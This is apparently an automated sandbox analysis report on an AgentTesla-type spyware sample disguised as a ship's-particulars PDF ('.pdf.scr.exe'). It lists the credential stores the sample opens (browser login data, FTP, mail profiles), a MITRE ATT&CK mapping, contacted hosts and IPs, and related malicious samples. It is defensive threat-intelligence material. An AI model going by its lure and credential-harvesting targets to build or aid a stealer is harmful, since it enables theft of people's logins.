                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 6712, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 796, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\FTP Navigator\Ftplist.txt
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 6712, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 796, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 6712, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 796, type: MEMORYSTR
MITRE ATT&CK matrix (columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Bracketed figures are the count badges shown on the matrix cells; techniques without a badge were not matched by any signature.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: [121] Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: [1] DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: [111] Process Injection, [1] DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: [11] Masquerading, [11] Disable or Modify Tools, [141] Virtualization/Sandbox Evasion, [111] Process Injection, [13] Obfuscated Files or Information, [2] Software Packing, [1] DLL Side-Loading, Indicator Removal from Tools
Credential Access: [2] OS Credential Dumping, [1] Credentials in Registry, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: [1] Query Registry, [111] Security Software Discovery, [1] Process Discovery, [141] Virtualization/Sandbox Evasion, [1] Application Window Discovery, [1] System Network Configuration Discovery, [1] File and Directory Discovery, [24] System Information Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: [1] Email Collection, [1] Archive Collected Data, [2] Data from Local System, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: [11] Encrypted Channel, [1] Ingress Tool Transfer, [2] Non-Application Layer Protocol, [13] Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label
MV BBG MUARA Ship's Particulars.pdf.scr.exe | 47% | ReversingLabs | Win32.Spyware.Negasteal
MV BBG MUARA Ship's Particulars.pdf.scr.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.sakkal.comhs | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
beirutrest.com | 50.87.144.157 | true | false | | high
api.ipify.org | 104.26.12.205 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.dyn.com/ | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/ianiDataSet2.xsdM | MV BBG MUARA Ship's Particulars.pdf.scr.exe | false | | high
http://www.tiro.com | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.org/t | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.carterandcone.coml | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/ianiDataSet.xsd | MV BBG MUARA Ship's Particulars.pdf.scr.exe | false | | high
http://www.sajatypeworks.com | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.org | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/ianiDataSet1.xsd | MV BBG MUARA Ship's Particulars.pdf.scr.exe | false | | high
http://www.founder.com.cn/cn | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/frere-user.html | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers8 | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.urwpp.deDPlease | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820131384.00000000025BA000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.comhs | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1822825090.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://beirutrest.com | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micros | MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4192547572.000000000641A000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
50.87.144.157 | beirutrest.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560137
Start date and time: 2024-11-21 13:05:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MV BBG MUARA Ship's Particulars.pdf.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/4@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 91
• Number of non-executed functions: 13
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: MV BBG MUARA Ship's Particulars.pdf.scr.exe
Time | Type | Description
07:06:13 | API Interceptor | 10528336x Sleep call for process: MV BBG MUARA Ship's Particulars.pdf.scr.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                            • api.ipify.org/
                                                                                            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                            • api.ipify.org/
                                                                                            6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                            • api.ipify.org/
                                                                                            perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                            • api.ipify.org/
                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                            • api.ipify.org/
                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                            • api.ipify.org/
                                                                                            hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                            • api.ipify.org/
                                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                            • api.ipify.org/
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • api.ipify.org/
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • api.ipify.org/
                                                                                            50.87.144.157CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              PEACE SHIP PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                ZHENGHE 3_Q88 20241118.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      Q88.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                        TROODOS AIR PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                              MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                beirutrest.comCHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 50.87.144.157
                                                                                                                PEACE SHIP PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                ZHENGHE 3_Q88 20241118.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                Q88.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                TROODOS AIR PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
Match: api.ipify.org
Associated Sample Name / URL | Detection | Threat Name | Context
CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | malicious | AgentTesla | 104.26.12.205
+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg | malicious | HtmlDropper | 104.26.12.205
DATASHEET.exe | malicious | AgentTesla | 172.67.74.152
datasheet.exe | malicious | AgentTesla | 104.26.13.205
datasheet.exe | malicious | AgentTesla | 104.26.13.205
https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 104.26.12.205
https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html | malicious | Gabagool | 104.26.12.205
https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com | malicious | Unknown | 104.26.12.205
IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.67.74.152
order and drawings_pdf.exe | malicious | AgentTesla | 104.26.12.205
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
CONTRACT COPY PRN00720387_pdf.exe | malicious | GuLoader | 188.114.97.3
https://bitly.cx/aMW9O9 | malicious | Unknown | 188.114.96.3
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 188.114.96.3
Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
PO-841122676_g787.exe | malicious | GuLoader | 188.114.97.3
file.exe | malicious | LummaC | 188.114.96.3
Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htm | malicious | BlackHacker JS Obfuscator | 104.17.25.14
phish_alert_sp2_2.0.0.0.eml | malicious | HTMLPhisher | 1.1.1.1
CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | malicious | AgentTesla | 104.26.12.205
wE1inOhJA5.msi | malicious | Remcos, RHADAMANTHYS | 172.64.41.3
Match: UNIFIEDLAYER-AS-1US
Associated Sample Name / URL | Detection | Threat Name | Context
CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | malicious | AgentTesla | 50.87.144.157
Secured Audlo_secpod.com_1524702658.html | malicious | Unknown | 69.49.245.172
https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ== | malicious | HTMLPhisher | 192.185.3.195
https://1.midlifemouse.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVFXRTNlSFU9JnVpZD1VU0VSMTIxMTIwMjRVNTUxMTEyMjQ=N0123Nexample@email.com | malicious | Unknown | 67.20.112.200
https://lmmoye.org/file/oL/xzw/ | malicious | Unknown | 69.49.234.173
USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | 216.172.172.178
Delivery_Notification_000275578.doc.js | malicious | Unknown | 162.241.225.96
USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader | 216.172.172.178
New Order - RCII900718_Contract Drafting.exe | malicious | FormBook | 108.179.253.197
arm7.nn-20241120-0508.elf | malicious | Mirai, Okiru | 162.144.165.86
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
PO#83298373729383838392387373873PDF.exe | malicious | Quasar | 104.26.12.205
CONTRACT COPY PRN00720387_pdf.exe | malicious | GuLoader | 104.26.12.205
https://bitly.cx/aMW9O9 | malicious | Unknown | 104.26.12.205
